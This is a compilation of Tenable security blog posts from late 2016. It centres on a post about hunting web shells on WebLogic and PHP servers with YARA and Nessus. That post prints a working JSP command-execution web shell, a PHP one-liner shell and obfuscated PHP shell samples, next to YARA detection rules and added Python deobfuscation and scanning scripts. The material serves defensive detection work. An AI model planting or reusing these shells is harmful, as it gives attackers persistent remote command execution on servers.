Channel: Tenable Blog

Tenable Welcomes Amit Yoran as Chairman and CEO

Tenable has announced that Amit Yoran, president of RSA, will be our new Chairman and CEO, effective January 3, 2017. We are honored to welcome one of the security industry’s most esteemed leaders and visionaries to our team.

Amit brings extraordinarily rich experience in security, from government service to his leadership at several highly successful and innovative cybersecurity companies. At RSA, a key billion-dollar security company, Amit has been responsible for strategic direction and operational excellence. Amit came to RSA through the acquisition of NetWitness, a high-growth network forensics company he founded and led as CEO. Prior to NetWitness, he was the founding director of the United States Computer Emergency Readiness Team program (US-CERT) in the U.S. Department of Homeland Security. Amit also founded Riptech (acquired by Symantec in 2002), one of the first managed security service providers (MSSPs).

We are excited about the opportunity to begin 2017 under Amit’s leadership, as we work with you, our customers, to address your cybersecurity challenges—from evolving technologies and ever-increasing attacks, to the need to better understand how security threats translate to business risks.

You can read more about this news in our 12/15/2016 press release.


Hunting for Web Shells

Web shells are nothing new, but their use continues to plague security professionals and their customers. With low anti-virus detection rates and few good tools to aid in discovery, how can you fight back?

A breach has occurred

On November 25th, 900 San Francisco Municipal Transportation Agency (SFMTA) computers were infected by a ransomware variant known as HDDCryptor. The ransom demand was 100 bitcoins (approximately $73,000). Due to the attack, the SFMTA was temporarily unable to collect an estimated $50,000 in fares.

San Francisco Municipal Transportation Agency

"You Hacked, ALL Data Encrypted, Contact For Key(cryptom27@yandex.com)ID:601, Enter Key:"

The immediate question is: “How did this happen?” In a press release, the SFMTA stated that their network “was not breached from the outside.” However, journalist Brian Krebs, in collaboration with Alex Holden of Holden Security Inc., reported that the SFMTA attacker “has been using a number of tools which enabled the scanning of large portions of the Internet and several specific targets for vulnerabilities” and that the “most common vulnerability used [was] ‘weblogic unserialize exploit’.”

Tenable is quite familiar with the various WebLogic deserialization exploits. The original vulnerability, CVE-2015-4852, was released as a zero day by FoxGlove Security. Further, Oracle’s original fix proved insufficient and led to CVE-2016-0638, CVE-2016-3510, and CVE-2016-5535, the last of which was recently patched in October, nearly a year after the original FoxGlove Security disclosure.

Nessus WebLogic scan

Nessus Flagging Deserialization Vulnerabilities in WebLogic

WebLogic web shell backdoor

Despite the SFMTA’s reassurances, the ransomer further claimed to “still have backdoors in the SMFTA network.” While many may be disinclined to take the word of this criminal, I believe the SFMTA would do well to hunt for any possible backdoors.

If WebLogic was the entry point into the SFMTA network, then it would have been trivial to drop a web shell backdoor onto the server to facilitate future access. WebLogic is perfect for a web shell because it can interpret JavaServer Pages (JSP) files.

For example, I took the following JSP web shell from the ysoserial project and I put it in the directory where WebLogic’s console application stores its cascading style sheets:

<%@ page import="java.util.*,java.io.*"%><html><body><form method="GET" name="myform" action=""><input type="text" name="cmd"><input type="submit" value="Send"></form><pre><%
        if (request.getParameter("cmd") != null)
        {
          out.println("Command: " + request.getParameter("cmd") + "<br>");
          Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
          OutputStream os = p.getOutputStream();
          InputStream in = p.getInputStream();
          DataInputStream dis = new DataInputStream(in);
          String disr = dis.readLine();
          while ( disr != null )
          {
            out.println(disr);
            disr = dis.readLine();
          }
        }
      %></pre></body></html>

I can then remotely execute shell commands from my browser via the WebLogic server:

Executing shell commands via the WebLogic server

Not only will this web shell provide backdoor access after WebLogic has been patched, but it also has a ridiculously low antivirus detection rate: 2/54.

Antivirus detection

Web shells: a wider problem

Web shells aren’t a WebLogic specific problem. Many web servers make great hosts for malicious shells. This has become such a problem that last year US-CERT issued an alert warning about the rising threat of web backdoors.

Web shells may seem obvious and unsophisticated, but advanced actors are using them as well. Deep Panda and Emissary Panda have both been known to use web shells like China Chopper. Crowdstrike wrote a very interesting article detailing a couple of Deep Panda’s backdoors that they encountered on an engagement.

But web shells aren’t just for sophisticated attackers. In my search for web shell samples, I used GitHub to search the many WordPress and Joomla! sites that are backed up there. Unsurprisingly, there are hundreds of these sites just riddled with backdoors. Consider this issue submitted by @tenacioustek:

Compromised website submission

A large chunk of the blame for that level of infection is not patching an Internet-facing server. However, there are other problems that should be considered. For instance, where are the tools for detecting web shells? Certainly, some exist (web shell detector and LOKI), but are they getting used? How well would they operate at an enterprise level?

Another part of the problem is the bad AV detection rates. I already showed you a JSP web shell with a 2/54 rate. In an excellent article by dfir it!, they present this simple PHP shell:

<? system($_REQUEST['cmd']); ?>

which has a detection rate of 0/54.

While there are better detection rates on some more well known shells like PBot (23/54), WSO (30/54), or C99 (45/57), it seems clear to me that AV is not as effective on this front as it could be.

A solution

As part of Nessus v6.8 in July 2016, we released a file system scanner that uses YARA. We even wrote a blog entry about it. YARA is perfect for hunting down web shells.

Consider the following YARA rule:

rule generic_jsp
{
    meta:
        description = "Generic JSP"
        family = "JSP Backdoor"
        filetype = "JSP"
        hash = "6517e4c8f19243298949711b48ae2eb0b6c764235534ab29603288bc5fa2e158"

    strings:
        $exec = /Runtime.getRuntime\(\).exec\(request.getParameter\(\"[a-zA-Z0-9]+\"\)\);/ ascii

    condition:
        all of them
}

This rule causes Nessus® to flag the web shell that I dropped onto the WebLogic server earlier in this blog:

Nessus WebLogic scan with YARA rule

More YARA rules

The problem with YARA is that you need rules for it to work. Unfortunately, Nessus doesn’t yet come with a rule set, but there are great projects like YARA Rules and LOKI that share their web shell rules with the world. Tenable has been working on a rule set that we hope to open source soon. Until then, here are a few of the more interesting web shells that we’ve created rules for.

Consider this PHP web shell:

<?php 
eval(gzinflate(base64_decode("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 JgQEwaoCwYb895+/f//+7/8="))); ?>

This is an obfuscated version of PHP/Small.B that has a detection rate of 8/54 on VirusTotal. Just looking at the code, you probably assume that the eval(gzinflate(base64_decode())) will unmask the web shell. However, that isn’t the case at all. Instead, this statement generates another eval(gzinflate(base64_decode())), which generates another, and another, and another, until eventually the web shell is finally exposed. You can find the deobfuscated version on GitHub.

Another obfuscated PHP script that we’ve seen is this uploader:

GIF89GHZ<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>

Notice how it starts out with the text GIF89GHZ? I think this is an attempt to fool automated tools into believing that it is a GIF. For example, the Linux file utility says this:

albinolobster@ubuntu:~ $ file 3xp.php 
3xp.php: GIF image data 23112 x 15370

I’m not entirely certain why this particular script uses GIF89GHZ. Far more popular is GIF89a as described here. Either way, you can see again that this script also relies on eval() and built-in PHP functions for obfuscation. Both the obfuscated and deobfuscated versions of this script have fairly low detection rates: 14/54 and 3/49 respectively.
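To see what lies under these layered eval() wrappers, here is an added Python example (not code from the post or from Tenable) that peels eval(f1(f2("...")))-style layers one at a time. It handles any chain of the six decoders the post names (base64_decode, str_rot13, gzinflate, gzuncompress, gzdecode, strrev), not only the two chains shown above, and it also flags the fake GIF header. The sample it unwraps is a constructed three-layer fixture around a harmless echo; real samples arrive already wrapped, and FOPO-style calls through a variable ($x("...")) are out of scope here.

```python
import base64
import codecs
import gzip
import re
import zlib

# PHP decoders that obfuscated samples chain inside eval(), each mapped to its
# Python equivalent. All of them take and return bytes.
DECODERS = {
    "base64_decode": lambda b: base64.b64decode(re.sub(rb"\s+", b"", b)),  # blobs are often line-wrapped
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "gzinflate": lambda b: zlib.decompress(b, -15),  # raw DEFLATE, no zlib header
    "gzuncompress": lambda b: zlib.decompress(b),    # zlib-wrapped stream
    "gzdecode": lambda b: gzip.decompress(b),        # gzip-wrapped stream
    "strrev": lambda b: b[::-1],
}
NAMES = "|".join(DECODERS)

# One layer: eval( f1( f2( ... "literal" ... ) ) ), whitespace tolerant.
# group(1) is the chain of function names (outer to inner), group(2) the literal.
LAYER_RE = re.compile(
    r"eval\s*\(\s*((?:(?:" + NAMES + r")\s*\(\s*)+)['\"]([^'\"]*)['\"]",
    re.DOTALL,
)


def unwrap_layer(php_source):
    """Strip one eval(...) layer. Returns (decoded_text, chain) or None if absent."""
    m = LAYER_RE.search(php_source)
    if not m:
        return None
    chain = re.findall(r"[a-z0-9_]+", m.group(1))
    data = m.group(2).encode("latin-1")
    for name in reversed(chain):  # the innermost call runs first
        data = DECODERS[name](data)
    return data.decode("utf-8", errors="replace"), chain


def unwrap_all(php_source, max_layers=64):
    """Peel layers until none is left; returns (final_source, list_of_chains).
    max_layers bounds a sample that keeps producing layers; a malformed literal
    stops the loop and returns what was recovered so far."""
    chains, current = [], php_source
    while len(chains) < max_layers:
        try:
            step = unwrap_layer(current)
        except (ValueError, zlib.error, OSError):
            break
        if step is None:
            break
        current, chain = step
        chains.append(chain)
    return current, chains


def fake_gif_header(php_source):
    """True when a file carries a GIF magic prefix (GIF87a/GIF89a style) but also
    PHP code, the trick that fools file(1) in the post."""
    return php_source.startswith("GIF8") and "<?php" in php_source


# --- constructed fixture (hypothetical, not a real sample) ---------------------
def _raw_deflate(b):
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(b) + c.flush()


ENCODERS = {  # inverse of each decoder; only used to build the fixture
    "base64_decode": base64.b64encode,
    "str_rot13": DECODERS["str_rot13"],  # rot13 is its own inverse
    "gzinflate": _raw_deflate,
    "gzuncompress": zlib.compress,
    "gzdecode": gzip.compress,
    "strrev": lambda b: b[::-1],
}


def wrap_layer(php_code, chain):
    """Build eval(chain[0](chain[1](...("literal")))); with chain outer to inner.
    Decoding runs inner to outer, so encoding runs outer to inner; the innermost
    function (chain[-1]) must accept text, e.g. base64_decode, str_rot13, strrev."""
    data = php_code.encode()
    for name in chain:
        data = ENCODERS[name](data)
    return 'eval(%s("%s")%s;' % ("(".join(chain), data.decode("latin-1"), ")" * len(chain))


INNER = "echo 'constructed benign payload';"
SAMPLE = "GIF89GHZ<?php " + wrap_layer(
    wrap_layer(wrap_layer(INNER, ["gzinflate", "base64_decode"]), ["base64_decode", "strrev"]),
    ["gzinflate", "base64_decode", "str_rot13"],
) + " ?>"

if __name__ == "__main__":
    final, chains = unwrap_all(SAMPLE)
    print("fake GIF header:", fake_gif_header(SAMPLE))
    for depth, chain in enumerate(chains, 1):
        print(f"layer {depth}: eval({'('.join(chain)}(...))")
    print("recovered:", final)
```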

Writing a rule to detect this type of obfuscation isn’t too hard if you are willing to accept that using eval followed by a string modifying function is an indicator of malicious intent:

rule eval_statement
{
    meta:
        description = "Obfuscated PHP eval statements"
        family = "PHP.Obfuscated"
        filetype = "PHP"
        hash = "9da32d35a28d2f8481a4e3263e2f0bb3836b6aebeacf53cd37f2fe24a769ff52"
        hash = "8c1115d866f9f645788f3689dff9a5bacfbee1df51058b4161819c750cf7c4a1"
        hash = "14083cf438605d38a206be33542c7a4d48fb67c8ca0cfc165fa5f279a6d55361"

    strings:
        $obf = /eval[\( \t]+((base64_decode[\( \t]+)|(str_rot13[\( \t]+)|(gzinflate[\( \t]+)|(gzuncompress[\( \t]+)|(strrev[\( \t]+)|(gzdecode[\( \t]+))+/

    condition:
        all of them
}

The last web shell I want to share is this shell shared by @bartblaze that uses the Free Online PHP Obfuscator (FOPO) and has a 0/53 detection rate. The shell is too big to paste here, but we are only really interested in the start. It looks like this:

<?php
/*
Obfuscation provided by FOPO - Free Online PHP Obfuscator:
http://www.fopo.com.ar/ This code was created on Tuesday, March 15th, 2016 at 5:21 UTC from IP 158.255.211.112 (tr) Checksum: e5a931bb23bbcc2dbf286decc8e2b2b72a7d9b0b */ $g2a594c0="\x62\x61\163\145\66\64\137\144\145\143\157\144\145";@eval($g2a594c0( "Ly9Oc044UThBMCtXVVJ6NytPQ2VkU0lGeFczNEwrR1NZVlJnZHN5M1pKK01mSXRJUkRYeU1OOGR2RX

This might look a little weird, but it is actually pretty straightforward. Cleaned up a bit, this is really:

$g2a594c0="base64_decode";
@eval($g2a594c0("…"));

Not too different from what we’ve seen in the previous obfuscated shells right? The only catch is that the Free Online PHP Obfuscator changes up how it encodes the base64_decode string. Here are some samples:

$ueafa759="\x62\141\163\x65\66\64\x5f\x64\x65\143\x6f\x64\145";
$c03a9f9c="\142\141\163\145\x36\64\x5f\x64\x65\x63\157\x64\x65";
$p44aaf5f="\x62\141\163\145\66\64\x5f\x64\145\143\x6f\x64\x65";

Each sample uses a different combination of hex and octal values in order to spell out base64_decode. Luckily, YARA makes this quite easy to detect:

rule fopo
{
    meta:
        description = "Free Online PHP Obfuscator"
        family = "PHP.Obfuscated"
        filetype = "PHP"
        hash = "b96a81b71d69a9bcb5a3f9f4edccb4a3c7373159d8eda874e053b23d361107f0"
        hash = "bbe5577639233b5a83c4caebf807c553430cab230f9a15ec519670dd8be6a924"
        hash = "a698441f817a9a72908a0d93a34133469f33a7b34972af3e351bdccae0737d99"

    strings:
        $base64_decode = /\$[a-zA-Z0-9]+=\"\\(142|x62)\\(141|x61)\\(163|x73)\\(145|x65)\\(66|x36)\\(64|x34)\\(137|x5f)\\(144|x64)\\(145|x65)\\(143|x63)\\(157|x6f)\\(144|x64)\\(145|x65)\";@eval\(/

    condition:
        all of them
}
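As an added check that is not part of the post, the following Python script applies the string patterns of the three rules above (generic_jsp, eval_statement and fopo) with the re module instead of YARA, and then generalises the fopo idea by decoding the hex/octal literal itself, so any mix of escapes that spells base64_decode is caught rather than only the thirteen alternations the rule enumerates. The fixtures are constructed one-line stand-ins for the samples discussed above; the variable names are the ones shown in the post.

```python
import re

# The three YARA string patterns from the rules above, carried over into Python's
# re syntax unchanged (YARA regexes are PCRE-like; these need no translation).
RULES = {
    "generic_jsp": re.compile(
        r'Runtime.getRuntime\(\).exec\(request.getParameter\("[a-zA-Z0-9]+"\)\);'
    ),
    "eval_statement": re.compile(
        r"eval[\( \t]+((base64_decode[\( \t]+)|(str_rot13[\( \t]+)|(gzinflate[\( \t]+)"
        r"|(gzuncompress[\( \t]+)|(strrev[\( \t]+)|(gzdecode[\( \t]+))+"
    ),
    "fopo": re.compile(
        r'\$[a-zA-Z0-9]+="\\(142|x62)\\(141|x61)\\(163|x73)\\(145|x65)\\(66|x36)'
        r"\\(64|x34)\\(137|x5f)\\(144|x64)\\(145|x65)\\(143|x63)\\(157|x6f)"
        r'\\(144|x64)\\(145|x65)";@eval\('
    ),
}


def match_rules(text):
    """Names of the rules that fire on text. Each rule's condition is
    'all of them' over a single string, so one hit is enough."""
    return [name for name, rx in RULES.items() if rx.search(text)]


# --- generalising the fopo rule: decode the literal instead of enumerating it ---
_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")


def php_unescape(literal):
    """Resolve the \\xHH and \\NNN escapes PHP accepts in double-quoted strings."""
    return _ESCAPE.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) else chr(int(m.group(2), 8)),
        literal,
    )


# $var = "<only \xHH / \NNN escapes>"
_ESCAPED_ASSIGN = re.compile(r'(\$[a-zA-Z0-9_]+)\s*=\s*"((?:\\(?:x[0-9A-Fa-f]{1,2}|[0-7]{1,3}))+)"')
DECODER_NAMES = {"base64_decode", "gzinflate", "gzuncompress", "gzdecode", "str_rot13", "strrev"}


def decoder_aliases(text):
    """Variables assigned an escape-only string that spells a decoder name and are
    then called inside eval(). Works for any hex/octal mix, upper-case hex included."""
    hits = {}
    for var, literal in _ESCAPED_ASSIGN.findall(text):
        name = php_unescape(literal)
        if name in DECODER_NAMES and re.search(r"eval\(\s*" + re.escape(var) + r"\s*\(", text):
            hits[var] = name
    return hits


def scan(text):
    """Combined verdict for one file's contents."""
    return {"rules": match_rules(text), "aliases": decoder_aliases(text)}


# Constructed fixtures: one-line stand-ins for the samples discussed in the post.
SAMPLES = {
    # the exec line of the ysoserial JSP shell
    "jsp_shell": 'Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));',
    # the eval chain of the GIF-prefixed uploader
    "nested_eval": 'GIF89GHZ<?php eval (gzinflate(base64_decode(str_rot13("AAAA")))); ?>',
    # FOPO header in exactly the form the fopo rule enumerates
    "fopo_lower": '<?php $g2a594c0="\\x62\\x61\\163\\145\\66\\64\\137\\144\\145\\143\\157\\144\\145";@eval($g2a594c0("AAAA"));',
    # same alias spelled with an upper-case \x5F: valid PHP, but outside the rule's alternations
    "fopo_upper": '<?php $p44aaf5f="\\x62\\141\\163\\145\\66\\64\\x5F\\x64\\145\\143\\x6f\\x64\\x65";@eval($p44aaf5f("AAAA"));',
    # the one-liner from the dfir it! article: none of the three rules cover it
    "one_liner": "<? system($_REQUEST['cmd']); ?>",
}

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(f"{label:12s} {scan(text)}")
```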

Conclusion

Malicious web shell use is widespread. If you are in charge of a web server, you must remain vigilant. Keep the server up to date with the latest patches and use any available tooling to ensure that no web shells are hiding on your server.

Top 5 Reasons to Stop Looking Back at 2016 or Making 2017 Predictions

It’s that time of year. Once we’ve run out of leftover Thanksgiving turkey for sandwiches, and our Black Friday purchases start to show up on our credit card statements, there are two things that seem to happen every year: reviewing the year gone by and making predictions for the year to come. I get it. It’s tradition. However, few ever learn any lessons of value from analyzing the events of the past year and even fewer gain any relevant insight into the year ahead from speculative prognostications—especially because most are either safe and obvious predictions or end up being wrong anyway. With that in mind, I have created a new list of reasons to stop doing that.

1. The past may not be relevant

Lots of stuff happened in the past 12 months. Even if we narrow the focus just to network and data security and security incidents, there’s no shortage of events to reflect on from 2016. However, most of those events affect platforms or technologies you don’t use, or target industries you’re not in, so reviewing them provides little value aside from increasing your knowledge of general information security trivia.

2. The past is not an indication of the future

The events that do relate directly to your industry or company provide greater value, but knowing what happened last year isn’t necessarily helpful for preventing future attacks or breaches. Reacting to past attacks leads to things like taking off shoes at TSA checkpoints. It might have been an effective means of preventing a past attack, but has little—if any—actual impact on preventing future attacks. It’s like closing the barn door after the horses have escaped.

3. Most predictions are wrong

Making predictions about technology or security is a bit like predicting the weather, and has as bad or worse odds of being accurate. Predictions are either painfully obvious—in which case they don’t provide any insight or value at all—or tend to be guesses more than predictions. The guesses are hopefully backed by some intelligent analysis of past and current trends or knowledge of cutting edge technologies, but ultimately they tend to be wish lists more than predictions, and those making them are as surprised as anyone else if or when they come true.

4. Predictions may not be relevant

There are some predictions that end up being accurate. A combination of “even a broken clock is right twice a day” and throwing enough ideas out there results in at least something eventually coming true. Odds are that the few predictions that prove to be accurate will fall into the category of things that don’t apply to your industry or to the platforms and applications your business relies on.

5. Better to look within

Make your own lists. There’s nothing inherently wrong with reviewing the past year or trying to make some educated guesses about the year to come. It makes good business sense. However, rather than relying on technology pundits to provide you with cookie cutter “Top 10” lists, you should analyze your own data and your own history, and use the information you have available to make your own predictions for 2017—predictions that are directly relevant to you and your company.

Analyze your own data and history to make your own predictions for 2017

If you simply must read the post mortem reviews of 2016, or check out the predictions and guesstimations for what 2017 has in store, feel free. I mean, it is tradition—like green beer on St. Patrick’s Day, fireworks on the 4th of July, or the Detroit Lions playing on Thanksgiving Day. Just do so with a realistic understanding of the value—or lack thereof—those provide for your business, and focus on the things that will actually make the most impact for you.

HIPAA Configuration Auditing

Looking to 2017, there may be new goals, challenges, and projects that face your organization. This is a good time to take the “10,000 foot view” of what your organization wants to address. While this is a great time to outline and plan new projects, this is also an opportune time to reassess current projects, including the controls put in place to address laws and regulations. One of those laws receiving attention in the news recently is the Health Insurance Portability and Accountability Act (HIPAA).

Consequences of noncompliance

Passed into law in 1996, HIPAA is certainly not new. HIPAA is an act that addresses administrative, technical, and physical controls around protecting sensitive patient data. Most organizations under HIPAA’s umbrella already have an understanding of what the act means to their organizations in terms of securing sensitive data. But organizations can also grow complacent in their processes and ultimately become noncompliant, as discussed in our Drifting Out of Compliance blog post. This is a dangerous situation for organizations, as the federal government just fined a university $650,000 for being compromised with remote access malware:

“In the 13th major HIPAA enforcement action so far this year (2016), federal regulators have slapped the University of Massachusetts Amherst with a $650,000 financial settlement and corrective action plan after investigating a relatively small 2013 breach involving a malware infection at a campus speech and language center.”

There have been over $12 million in HIPAA-related fines in 2016

Information security is a dynamic sector, regularly changing to remain current with trends, and your organization should not overlook controls and processes that act as the foundation of your overall security program. While the HIPAA acronym may be dated in some people’s minds, the enforcement certainly is not. There have already been over $12 million in HIPAA-related fines in 2016 alone. Organizations should regularly assess their current processes that pertain to these controls so that they don’t lose track of their effectiveness.

Our blog, Tips for Making The Most of Your Year-End Spending, provides advice on budgeting for the new fiscal year. Two important tips are evaluating your current environment, and identifying the gaps between your current status and goals. Has your environment expanded at all? Does the new environment fall under HIPAA regulation? If so, do you have proper controls in place to protect that environment?

Two important tips: evaluate your current environment, and identify the gaps between your current status and goals

Tenable solutions

Tenable provides solutions that enable organizations to address these year-end questions by tracking and assessing environments with continuous network monitoring. The Tenable Assurance Report Cards (ARCs) do a great job of quickly analyzing environments against pre-defined baselines with a Pass/Fail grading. Organizations can leverage ARCs to quickly assess whether a previously compliant environment has developed compliance failures, or to grade completely new environments. In addition to ARCs, the HIPAA Configuration Audit Summary dashboard in SecurityCenter Continuous View® (SecurityCenter CV™) has been updated. It provides detailed and relevant data from your environment for security analysis and HIPAA compliance. The dashboard features over ten components that address HIPAA concerns such as:

  • Access Control & Workstation Security
  • Security Management Process
  • Integrity, Authentication & Transmission Security

You can customize these components to fit the uniqueness of your environment. The HIPAA dashboard also automatically tracks the number of hosts for each component, while displaying the percentage of hosts that have passed and the percentage of hosts that have failed.

HIPAA Configuration Audit Summary Dashboard

Conclusion

There are always new trends and concerns to be addressed when securing an environment, but fundamental processes, controls, and compliance should not be forgotten. Organizations can leverage Tenable solutions to keep up with the latest security trends while simultaneously addressing well-established regulation responsibilities such as those put in place by HIPAA.

Top 12 Tenable Blogs for 2016

As the year draws to a close, we’d like to share our most popular blogs from 2016. From UPnP detection to Mr. Robot exploits, our readers were most interested in the technical details of cybersecurity issues. But there’s something for everyone in our top 12 blogs of 2016:

    1. Hunting for Web Shells - Jacob Baines 12/20/16
    2. Do You Know Where Your UPnP Is? - Jacob Baines 10/20/16
    3. Expanding on a Known Vulnerability: Attacking with Jython - Jacob Baines 9/7/16
    4. Threat Hunting with YARA and Nessus - Jacob Baines 7/20/16
    5. Tenable Automates NIST Cybersecurity Framework Technical Controls - Ted Gary 3/1/16
    6. Mr. Robot vs. the Android - Andrew Freeborn 8/31/16
    7. New in Nessus 6.6 - Diane Garey 4/11/16
    8. Detecting Mr. Robot Malware - Cody Dumont 8/10/16
    9. Auditing Microsoft Azure with Nessus v6.5 - Mehul Revankar 1/26/16
    10. What is No-ware? - Ron Gula 1/19/16
    11. New Scan Policies, Plugins and Dashboard for CVE-2016-0800: DROWN - Kelly Prevett 3/7/16
    12. NIST Cybersecurity Framework Adoption on the Rise - Nicole Cieslak 3/29/16

    Did you know you can subscribe to the Tenable Blog? The free subscription service delivers notifications of new blogs every day or once a week right into your email inbox; no need to use an RSS reader to see new Tenable blogs. Go to the Blog Home page, and under Follow Us, click the Blog email updates option. Tenable blogs were recommended by such sites as Reddit and France’s Sciences et Avenir this year. Join those in the know and stay informed about the latest cybersecurity news from Tenable!

    GRIZZLY STEPPE Detection with SecurityCenter

    Governments and businesses around the world are always potential targets for spear phishing campaigns and APTs like GRIZZLY STEPPE. On December 29, 2016 the U.S. Department of Homeland Security (DHS) and Federal Bureau of Investigation (FBI) released a Joint Analysis Report (JAR-16-20296) which included technical details about activity tied to exploitation and the eventual compromise of systems within the United States. The U.S. government is referring to this malicious cyber threat as GRIZZLY STEPPE. The Joint Analysis Report includes GRIZZLY STEPPE indicators of compromise such as a YARA rule and suspicious IP addresses and DNS names. Global organizations must be vigilant about detecting these latest indicators of compromise. SecurityCenter® can easily scan for these indicators and alert on any detections.

    How does GRIZZLY STEPPE work?

    GRIZZLY STEPPE follows a familiar attack pattern. It targets unsuspecting users with a spear phishing campaign, enticing them to click on a malicious link. As soon as the link is clicked, malicious code is delivered and executed, establishing persistent remote access to that system via a Remote Access Tool (RAT), typically in the form of a web shell.

    Once a persistent connection has been established, the next step usually involves escalating privileges and enumerating Active Directory accounts, leading to all sorts of nefarious activity.

    Indicators of compromise

    The Joint Analysis Report released by DHS and FBI included many Indicators of Compromise (IOCs) which organizations can use to assess if their systems have been compromised. The chief indicator among them is a YARA rule which detects a PHP web shell which was used as part of the GRIZZLY STEPPE campaign.

    Here’s the YARA rule:

    rule PAS_TOOL_PHP_WEB_KIT
    {
    meta:
       description = "PAS TOOL PHP WEB KIT FOUND" 
    strings:
       $php = "<?php"
       $base64decode = /\='base'\.\(\d+\*\d+\)\.'_de'\.'code'/ 
       $strreplace = "(str_replace("
       $md5 = ".substr(md5(strrev("
       $gzinflate = "gzinflate"
       $cookie = "_COOKIE"
       $isset = "isset"
    condition:
       (filesize > 20KB and filesize < 22KB) and
       #cookie == 2 and
       #isset == 3 and
       all of them
    }
